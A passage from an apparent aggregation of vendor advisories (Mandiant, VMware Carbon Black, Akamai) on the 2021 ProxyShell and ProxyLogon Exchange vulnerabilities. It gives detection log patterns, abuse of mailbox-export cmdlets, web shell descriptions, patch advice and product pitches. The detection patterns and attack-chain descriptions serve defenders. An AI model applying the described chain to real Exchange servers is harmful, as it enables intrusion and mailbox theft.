servers.\n\n##### Remote Creation of Items in Mailboxes\n\n * Monitor or investigate irregular Exchange EWS logs to identify CreateItem requests, indicating the remote creation of items.\n * Mandiant has observed draft emails created, containing attached encoded web shells, though other items may also be created.\n * Examine logs under \u2018Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\Ews\\\\*\u2019 where:\n * AuthenticatedUser is SYSTEM or a system account\n * SoapAction is CreateItem\n * HttpStatus is 200 (indicating success)\n * Monitor or identify draft emails with encoded attachments.\n * Mandiant has observed draft emails containing .TXT file 
attachments with encoded content.\n\n##### Remote Unauthenticated PowerShell\n\n * Monitor IIS logs for successful POST requests containing \"/autodiscover/autodiscover.json\" & \"Powershell\".\n * Monitor or investigate the execution of the PowerShell cmdlets \u2018New-ManagementRoleAssignment\u2019 or \u2018New-MailboxExportRequest\u2019.\n * Mandiant has observed \u2018New-ManagementRoleAssignment\u2019 being used to assign mailbox import and export permissions to target mailboxes, followed by \u2018New-MailboxExportRequest\u2019 to export the drafts folder containing emails with encoded web shells attached.\n * Examine PowerShell ScriptBlock, transcription, and module logging where enabled.\n * Examine logs under \u2018Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\CmdletInfra\\Powershell-Proxy\\Cmdlet\\\\*\u2019, especially the cmdlet parameters where:\n * AuthenticatedUser is the name of impersonated mailbox user\n * ProcessName contains w3wp\n * Cmdlet is \u2018New-ManagementRoleAssignment\u2019 or \u2018New-MailboxExportRequest\u2019\n * Mandiant has observed the \u2018CmdletInfra\\Powershell-Proxy\\Cmdlet\u2019 logs recording remote cmdlets and their parameters even when regular PowerShell ScriptBlock/transcription/module logging is not enabled.\n * Mandiant recommends review of these logs on presently or previously vulnerable servers even in cases where no web shell is identified, since attackers may execute any PowerShell cmdlet, utilizing only part of the exploit chain.\n * Examine the \u2018Data\u2019 field in the Audit logs stored under \u2018\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\LocalQueue\\Exchange\\\\*\u2019. 
This field contains JSON data with the Operation Key value containing the executed PowerShell cmdlets.\n\n#### Creation or Use of Web Shells\n\n * Monitor or identify .ASPX files created under the path inetpub\\wwwroot\\aspnet_client written by SYSTEM.\n * Monitor or identify PST files (by header \u2018!BDN\u2019 / 0x2142444E) with web file extensions (commonly .ASPX). These files may be written by MSMailboxReplication.exe or w3wp.exe (the latter can be the result of replication events due to the exploitation of a different Exchange server in the same cluster).\n * Monitor or identify files created by MSMailboxReplication.exe with extensions other than .PST (this binary is used by the New-MailboxExportRequest PowerShell cmdlet).\n * Monitor or identify arbitrary commands spawned by the process w3wp.exe.\n * Monitor or investigate the \u2018MSExchange Management\u2019 Event logs (EID: 1 and EID: 6) to identify \u2018New-MailboxExportRequest\u2019 requests with .ASPX extensions, indicative of a web shell creation attempt.\n\nAdditional attempted or successful exploitation may be identified by analyzing network and IIS logs looking for HTTP requests matching some of the patterns described in this report.\n\n * Requests against /autodiscover/autodiscover.json containing \u2018powershell\u2019, \u2018mapi/nspi\u2019, \u2018mapi/emsmdb\u2019, \u2018/EWS\u2019 or \u2018X-Rps-CAT'.\n * Status codes 200, 301, or 302 indicating successful exploitation.\n * Status codes 400, 401, or 404 indicating attempted exploitation.\n\n#### Prevention and Remediation\n\nMandiant advises all organizations to apply patches [KB5003435](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-may-11-2021-kb5003435-028bd051-b2f1-4310-8f35-c41c9ce5a2f1>) (CVE-2021-31207) and 
[KB5001779](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064>) (CVE-2021-34473 and CVE-2021-34523) to vulnerable on-premises Microsoft Exchange servers to prevent these vulnerabilities from being exploited. To verify the current version of on-premises Microsoft Exchange running within an organization, reference this [Microsoft resource](<https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates>).\n\nIf an organization is not able to immediately apply the patches, inbound TCP/80 and TCP/443 traffic to on-premises Exchange servers should be explicitly blocked from the Internet.\n\nAdditionally, Mandiant recommends organizations review their detection and response capabilities, especially on public-facing infrastructure, including:\n\n * Deploying and configuring a File Integrity Monitoring solution to monitor and/or prevent the creation of files, especially on web servers outside of maintenance windows\n * Deploying, configuring, and monitoring an Endpoint Detection and Response solution to alert on and respond to malicious activity effectively\n * Enabling enhanced logging and implementing sufficient log retention periods to support investigations, including:\n   * Microsoft System Monitor (Sysmon) on Windows Servers\n   * PowerShell Module, Script Block, and Transcription Logging\n\n#### Detecting the Techniques\n\n| Product | Signature |\n|---|---|\n| FireEye Endpoint Security | PST FILEWRITE WITH ASP EXTENSION (METHODOLOGY); W3WP.EXE CHILD PROCESS RECON COMMAND (METHODOLOGY); WMICEXEC (FAMILY) |\n| FireEye Network Security | Exploit.PY.ProxyShell; Microsoft Exchange CVE-2021-34473 Remote Code Execution; FE_Microsoft Exchange CVE-2021-34473 Remote Code Execution |\n| FireEye Email Security; FireEye Detection On Demand; FireEye Malware File Scanning; FireEye Malware File Storage Scanning | FEC_Exploit_PY_ProxyShell; FE_Hunting_PSTWithEmbeddedWebShell; FE_Exploit_PY_ProxyShell |\n| FireEye Helix | MICROSOFT EXCHANGE [ProxyShell Exploit Attempt]; MICROSOFT EXCHANGE [ProxyShell Exploit Success]; MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) - Mailbox Export]; MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write (CVE-2021-31207) - Certificate Request Export] |\n\n#### Mandiant Security Validation Action\n\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\n\n| VID | Name |\n|---|---|\n| A101-827 | Application Vulnerability - CVE-2021-34473, ProxyShell Vulnerability Check |\n| A101-829 | Application Vulnerability - ProxyShell, Exploitation |\n| A101-839 | Malicious File Transfer - ProxyShell WebShell, Download |\n\n#### Malware Definitions\n\n##### BLUEBEAM\n\nBLUEBEAM (aka Godzilla) is a publicly available web shell management tool written in Java. BLUEBEAM can generate web shell payloads in JSP, ASP[.]NET, and PHP; it also supports AES encryption.\n\nBLUEBEAM contains 20 built-in modules that provide features such as loading additional web shells into memory, shell execution, mimikatz, meterpreter, file compression, and privilege escalation.\n\n##### HTRAN\n\nHTRAN is a publicly available tunneler written in C/C++ that serves as a proxy between two endpoints specified via command line arguments.\n\n##### EARTHWORM\n\nEARTHWORM is a publicly available tunneler utility. It is capable of establishing a tunnel to a SOCKS v5 server and is supported on the following operating systems: Linux, MacOS, and Arm-Linux.\n\n##### CHINACHOP\n\nThe CHOPPER web shell is a simple code injection web shell that is capable of executing Microsoft .NET code within HTTP POST commands. 
This allows the shell to upload and download files, execute applications with webserver account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.\n\nFor more detailed analysis, see our blog post on the China Chopper web shell.\n\n#### Acknowledgements\n\nAlex Pennino, Andrew Rector, Harris Ansari and Yash Gupta\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T10:00:00", "type": "fireeye", "title": "PST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-09-03T10:00:00", "id": "FIREEYE:FC60CAB5C936FF70E94A7C9307805695", "href": "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "carbonblack": [{"lastseen": "2021-03-10T12:27:08", "description": "_The following advisory from VMware Threat Analysis Unit (TAU) is to provide guidance, best practices and 
capabilities to identify risk, prevent, detect and respond to this emerging threat._\n\n#### Summary\n\nOn March 2, 2021, Microsoft [announced](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) four zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) directly targeting Microsoft Exchange servers hosted locally.\n\nThese four zero-day vulnerabilities are chained together to gain access to Microsoft Exchange servers as an entry point to exfiltrate data and persist for malicious gain. In order for the attack to work, the threat actor would need to access an on-premises Microsoft Exchange server via port 443. Once accessed, the threat actors will then utilize the above vulnerabilities to gain remote access.\n\nIf you have Microsoft Exchange Server 2013, 2016, and/or Microsoft Exchange Server 2019 hosted locally, it is best practice to apply the updates provided by Microsoft immediately to protect against these exploits, with an emphasis on prioritizing externally facing Exchange servers.\n\n#### Threat Actor Attribution\n\nMicrosoft identified Hafnium, a state-sponsored threat actor that operates from China, as the group responsible for the recent attacks. Hafnium has also been reported to be responsible for other attacks on internet-facing servers and typically exfiltrates data to file sharing sites. After gaining access to a vulnerable workload, Hafnium will install a web shell that allows them to steal data, upload files, and execute almost any command. Hafnium will then use this web shell to perform a memory dump of the LSASS.exe process to harvest cached credentials. 
This will enable them to export mailboxes and stolen data from the workload and upload it to file-sharing services, where they could later retrieve it.\n\n#### Detections and Recommended Response Actions\n\nThe Microsoft Exchange Server team has created a script to check for Hafnium IOCs that addresses performance and memory concerns. That script is available [here](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>).\n\nMicrosoft Senior Threat Intelligence Analyst [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1366858907671552005>) has created an [Nmap script](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nTo use the script, download it from his GitHub page, store it in /usr/share/nmap/scripts, and then run the nmap -script http-vuln-exchange command.\n\nFigure: Nmap script output showing a potentially vulnerable Microsoft Exchange server.\n\nOnce you have determined which Exchange servers need to be updated, you need to make sure your servers have a currently supported Cumulative Update (CU) and Update Rollup (RU) installed.\n\nAdministrators can find more information on the supported updates and how to install the patches in an [article from the Microsoft Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) published today.\n\n#### VMware Carbon Black Cloud Endpoint And Workload Protection Best Practices\n\n**Patch** \nPrioritize installing the recommended patches in your Microsoft Exchange environment, as these vulnerabilities enable unauthenticated remote code execution and file writes. If you are leveraging VMware Carbon Black Workload, you can quickly identify which assets have these critical exploitable CVEs within your vCenter or within the VMware Carbon Black Cloud platform. 
In the platform, risk is prioritized based on how exploitable each CVE is.\n\n**Network** \nOur TAU also recommends implementing egress network ACLs for all externally facing web services in your environment.\n\n**Windows Operating Systems** \nVMware Carbon Black customers running the 3.6 sensor versions are protected out of the box without any need to configure rules relating to the post-compromise credential theft techniques disclosed. The latest versions of the VMware Carbon Black Cloud sensors will also detect and block suspect PowerShell usage typically associated with post-compromise behaviors using the AMSI detection capabilities.\n\nVMware Carbon Black Cloud customers utilizing NGAV and EDR detection analytics will generically identify and alert on behaviors associated with Web Shell activity, Reverse Shells, and unusual command interpreter behaviors.\n\nVMware TAU also recommends that customers enable the following Anti-Malware engine settings within the VMware Carbon Black Cloud console to ensure the best possible protection:\n\n * Delay executes for cloud scan\n * Submit unknown binaries for analysis\n\n_In order to take full advantage of the most up-to-date threat intelligence detection and prevention rules, customers must be running VMware Carbon Black Cloud sensor version 3.6 or greater and running NGAV._\n\nThe post [TAU Threat Advisory: Microsoft Exchange Servers Targeted with Four Zero-day Exploits](<https://www.carbonblack.com/blog/tau-threat-advisory-microsoft-exchange-servers-targeted-with-four-zero-day-exploits/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T21:05:13", "type": "carbonblack", "title": "TAU Threat Advisory: Microsoft Exchange Servers Targeted with Four Zero-day Exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-08T21:05:13", "id": "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "href": "https://www.carbonblack.com/blog/tau-threat-advisory-microsoft-exchange-servers-targeted-with-four-zero-day-exploits/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2021-03-15T22:39:29", "description": "Co-authored by Ryan Barnett.\n\n### AppSec Protections for Microsoft Exchange CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065\n\nOn March 2, 2021, the Microsoft Security Response Center alerted its customers to [several critical security updates](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to Microsoft Exchange Server, addressing vulnerabilities currently under attack. \n\nThe United States Computer Emergency Readiness Team Cybersecurity and Infrastructure Security Agency also issued an [alert with recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>) on how to mitigate the vulnerabilities. 
\n\n * [CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.\n * [CVE-2021-26857](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26857>), [CVE-2021-26858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858>), and [CVE-2021-27065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065>) allow for remote code execution.\n * CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary file write vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.\n * CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server.\n * To locate a possible compromise of these CVEs, we encourage you to read the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n### How Akamai Can Help\n\nCustomers that use Akamai Web Application Firewall solutions, Kona Site Defender and Web Application Protector, with the Automated Attack Groups engine have received an automatic update for protection. 
Akamai recommends that customers using Automated Attack Groups set all their attack groups, but specifically the Web Platform Attack Group, to Deny to prevent these exploitation attempts.\n\nKona Site Defender customers using Kona Rule Set (KRS) should update their profile and enable newly released rules ID 3000083 and 3000084 in the Total Request Score (Inbound) attack group in order to protect against attempts to exploit the following CVEs:\n\n * CVE-2021-26855, which is the SSRF vulnerability\n * CVE-2021-27065, which is being used to upload webshells\n\n**Akamai recommends that either the attack group or the individual KRS rules be put into Deny mode to protect against attempts to exploit these vulnerabilities.**\n\nAkamai's research and intelligence teams observed that attackers have been quick to automate their target identification and exploitation attempts. A variety of existing controls in Akamai's security portfolio are designed to detect these attempts:\n\n 1. Web Application Firewall \\-- Rate Controls, TOR IP Blocklist, and Penalty Box are all also detecting and blocking this scanning traffic\n 2. Client Reputation \\-- the \"Web Scanner\" and \"Web Attacker\" categories are identifying many attackers searching for vulnerable targets\n 3. 
Bot Management \\-- controls detect the incoming traffic to be automated or from anonymous proxies\n\nIf you have any questions, please reach out to Akamai Support Services or your account team.\n\n## Global Attack Intelligence\n\nOver the last 48 hours on our global platform we have observed:\n\n * 290,000 unique attempts to scan and/or exploit these vulnerabilities\n * 952 unique IPs involved in these attempts \n * 731 of these unique IPs were identified by Akamai Client Reputation threat intelligence as known web scanners or web attackers with a median score of 9.6 out of 10\n * 23,910 unique hosts targeted\n * 80% of attack activity targeted against Commerce, High-Tech, Financial Services, and Manufacturing verticals\n * 90% of all attack attempts targeted against organizations in the United States, Austria, India, Canada, Germany, France and the United Kingdom\n * Assetnote and Qualys were the top two known scanners\n\n[  ](<https://blogs.akamai.com/Microsoftblog2.png>) **Figure**: Attack sources; the top number represents the number of requests and the bottom number represents the number of IPs\n\n## Conclusion and Recommended Steps\n\nWe've confirmed active attempts of exploitation of Microsoft Exchange/Outlook Web Access zero-day vulnerabilities.\n\nSuccessful exploitation allows an unauthenticated attacker to execute arbitrary code and install webshells on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system.\n\nMitigation and remediation can be achieved by following these steps:\n\n 1. Akamai customers that have Exchange/Outlook Web Access protected by either Kona Site Defender using the Automated Attack Groups rule set or the Web Application Protector product have already received an automatic update to the Platform Attacks Group. 
Kona Site Defender customers that are using the Kona Rule Set, however, need to take steps to activate the new rules to receive protection.\n 2. Customers should also deploy updates to affected Exchange Servers as recommended by Microsoft and enable the Akamai protections as recommended above.\n 3. Customers should investigate for exploitation or indicators of persistence.\n 4. Customers should remediate any identified exploitation or persistence and investigate their environment for indicators of lateral movement or further compromise.\n\nCompanies should consider implementing Zero Trust Network Access (ZTNA) to be able to weather software vulnerabilities like these. Unlike the traditional \"verify, then trust\" model -- which means if someone has the correct user credentials, they are admitted to whichever site, app, or device they are requesting -- ZTNA dictates that users and devices are never trusted and can only access applications and data after passing a secure authentication and authorization process that does not solely rely on user credentials. 
You can read more about how ZTNA can protect corporate resources in the context of these Microsoft Exchange vulnerabilities in the blog post, [Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool](<https://blogs.akamai.com/2021/03/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html>).\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T22:30:00", "type": "akamaiblog", "title": "How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-15T21:41:53", "id": "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/q7n8HyPxlM4/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-24T18:27:13", 
"description": "The past month has been a very dynamic time in the world of security for hackers and threat researchers, but it has been an extended nightmare for CSOs responsible for securing their enterprise networks. \n\nFor starters, on-premise Microsoft Exchange servers were attacked in droves after a set of zero-day vulnerabilities were discovered, resulting in [widespread infiltration of hundreds of thousands of organizations](<https://www.zdnet.com/article/microsoft-exchange-server-attacks-theyre-being-hacked-faster-than-we-can-count-says-security-company/>). These vulnerabilities allow malicious actors to remotely control machines, read emails, and gain access to internal corporate assets. To illustrate how widespread this attack was, in the two days following the disclosure, Akamai observed [over 290,000 unique attempts to scan and/or exploit these vulnerabilities on our global platform](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>). Microsoft rapidly issued patches for the vulnerability, but the breadth and scale of the breaches won't be truly known for some time, with some enterprises experiencing advanced persistent threats as a result of the exploit.\n\nAs if this wasn't already bad enough, customers of IT security company F5, which has included almost all of the world's Fortune 50 companies, found themselves rocked with [yet another set of highly severe application vulnerabilities](<https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html>), this time for F5's BIG-IP family of load balancing and security products. These vulnerabilities allow for remote execution of system commands, potentially allowing complete control of the server, interception, and redirection of web traffic, decryption of traffic destined for web servers, and infiltration as a jump host to reach other areas of the network. 
The National Vulnerability Database ranked these vulnerabilities as critical, some with a [CVSS rating](<https://nvd.nist.gov/vuln-metrics/cvss>) as high as 9.9 out of 10.\n\nBoth of these vulnerabilities, which are actively being exploited by real-world attackers, involve robust highly-utilized systems that have authentication built directly in. So how did this happen?\n\n## Application Authentication\n\nIn both the Microsoft Exchange and F5 BIG-IP products, authentication is required before privileged activities can be performed. While this is an important and required facet of security, many individuals falsely assume that this authentication, which is applied at the application level, provides ample protection.\n\nThis is a misconception, however. If an end user can reach an application such that it prompts them to enter credentials, they have already caused code to execute. This is true regardless of the authentication method or prompt. It does not matter whether the application redirects an end user to an IdP or asks for a username and password directly; the very act of asking for credentials means the application was contacted over the network, code was executed, and a response was tendered to the end user.\n\nAnd this is where the problem lies. Applications are written by human beings, and human beings make mistakes. This is at the heart of the vulnerabilities within Microsoft Exchange and F5 BIG-IP. In both cases, there were incorrect checks against the authentication, which allowed payloads to bypass valid logins and result in exploitation. In other words, the very fact that the systems are reachable is enough to exploit them.\n\nIf you can't trust that the application is implemented perfectly, then what can you do?\n\n## Network Authentication\n\nThe right answer to this problem has been known for quite some time: tie the authentication to not only the application but to the network as well. Zero Trust Network Access is one such method to do this. 
In a Zero Trust environment, a proxy sits between an enterprise's internal network assets and the users who wish to access them. Basic network communication cannot be established until the end user's identity has been established.\n\nThe authenticators that can be used in a Zero Trust environment tend to be far richer than a VPN, including user identity, groups, device posture, multi-factor authentication (MFA), time of day, location, user and entity behavior analytics (UEBA), client reputation, and more. Only once the proxy has validated the authentication and determined the user is authorized for access does it allow packets to actually reach the application, where it too can then perform additional authentication and authorization checks.\n\nThis has a massive impact on reducing the threat surface of the attacks. In the case of Microsoft Exchange and F5 BIG-IP, it means the vulnerabilities can only be exercised by insiders as opposed to anyone in the world that can reach the machine. This is a drastic improvement.\n\nBut is there anything else we can do?\n\n## It's All About Who and What\n\nReducing the threat surface from the entire world to insiders only is arguably the most impactful step that an enterprise can take toward protecting itself from the above style of vulnerabilities. However, this does not completely eliminate the threat. It simply restricts who can exercise it.\n\nThe problem is that insiders can also be malicious, either directly, or much more often, indirectly through malware installed on their machine or theft of credentials and forged identities by malicious actors. To further protect oneself, a web application firewall (WAF) can help eliminate the risk of what is being sent. 
Once signatures of the attack are known, a WAF stops even malicious insiders from delivering exploit payloads, further strengthening an enterprise's security posture.\n\nOne may wonder why it's worth having a WAF when patches will eventually eliminate the vulnerability altogether. The answer is in the term eventually. Enterprises can be achingly slow to apply critical patches, having experienced crushing downtimes when poorly written patches have caused outages. In other environments, an enterprise may not even have a full inventory of all of their assets that require patching.\n\nIn these cases, providing a WAF can safely extend the time to patch. Administrators can test the patch, create a staging environment, and deploy over a timeline that meets the business needs, assured that they are safe from exploitation as the WAF is filtering all communications to the vulnerable services.\n\n## A Call to Action\n\nFortunately, Akamai provides a comprehensive suite of products, services, and capabilities that can be used to make your organization safer and more secure.\n\nFirst, our [Akamai Enterprise Application Access](<https://www.akamai.com/us/en/products/security/enterprise-application-access.jsp>) product is a complete Zero Trust Access solution that allows for the closure of all inbound firewall ports and the removal of DMZ applications. Through our set of proxies and rich authentication and authorization primitives, authorized users and devices have full access to only the set of internal applications they need, without additional access to any other assets on the network.\n\nFor employees, these heightened security checks do not mean additional steps or inconvenience when accessing the IT resources they need. In fact, things become simpler and more secure. 
Native integration with Active Directory, Azure AD, SAML, OIDC, OAuth, and more means your enterprise can gain the noted security benefits without any changes to your existing application authentication flows.\n\nAdditionally, the inclusion of our [Akamai MFA](<https://www.akamai.com/us/en/products/security/akamai-mfa.jsp>) product extends the noted protections through the use of patent-pending phish-proof multi-factor authentication, allowing end users to use their smartphones to leverage state-of-the-art FIDO2 authentication, the strongest standards-based method currently available. With other solutions, this still requires the use of physical security keys, which not only come at a cost but are also typically perceived as inconvenient and not very popular among employees.\n\nFinally, Akamai's Kona WAF is designed to block not only the full suite of standard attacks web applications receive but also the specific attacks on unpatched Exchange instances noted earlier; for details, please read [How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>).\n\nAkamai can help you [start your Zero Trust security journey](<https://www.akamai.com/us/en/solutions/security/zero-trust-security-model.jsp#zero-trust-security-journey>) and move to a least-privilege application access model. 
[Contact us](<https://www.akamai.com/us/en/contact-us/>) for more information on how we can help you mitigate similar security incidents!\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-24T14:00:00", "type": "akamaiblog", "title": "Authentication: Lessons Learned from Microsoft Exchange and F5 BIG-IP Hacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-2706"], "modified": "2021-03-24T17:05:35", "id": "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/iGDirCGcXcg/authentication-lessons-learned-from-microsoft-exchange-and-f5-big-ip-hacks.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-15T22:39:29", "description": "It's been an interesting start to March in terms of public security incidents. \n\nThis month kicked off with multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. 
And, as if that wasn't enough, that attack was quickly followed by the news that a hacktivist \"collective\" calling itself APT-69420 claims to have breached the internal systems of the Silicon Valley firm Verkada. That particular breach has garnered widespread press coverage as the group claims to have gained access to live video feeds from more than 150,000 surveillance cameras. \n\nFor me, both of these incidents -- and the responses from the various impacted firms -- brought to mind what we as an industry have been talking about for a while: [why moats and castles belong in the past](<https://blogs.akamai.com/2017/04/why-moats-and-castles-belong-in-the-past.html>).\n\nFrom my perspective, these incidents represent yet another reason why moving to a Zero Trust security model that leverages a cloud-first approach is the future of security for the majority of us. \n\nWhy? It's pretty simple.\n\nLet's look at the Exchange remote code execution vulnerability first. \n\nMicrosoft strongly urged customers to patch on-premises systems immediately. But, as we all know, patching systems isn't always as easy or quick as it sounds, especially for IT teams that are generally overwhelmed and understaffed. As one would expect, [multiple actors continue to take advantage of unpatched systems to attack organizations with vulnerable on-premises Exchange Servers](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n[](<https://blogs.akamai.com/Miscosoft%20Image%201.png>)\n\nAt Akamai, our threat research team rolled out signatures for our 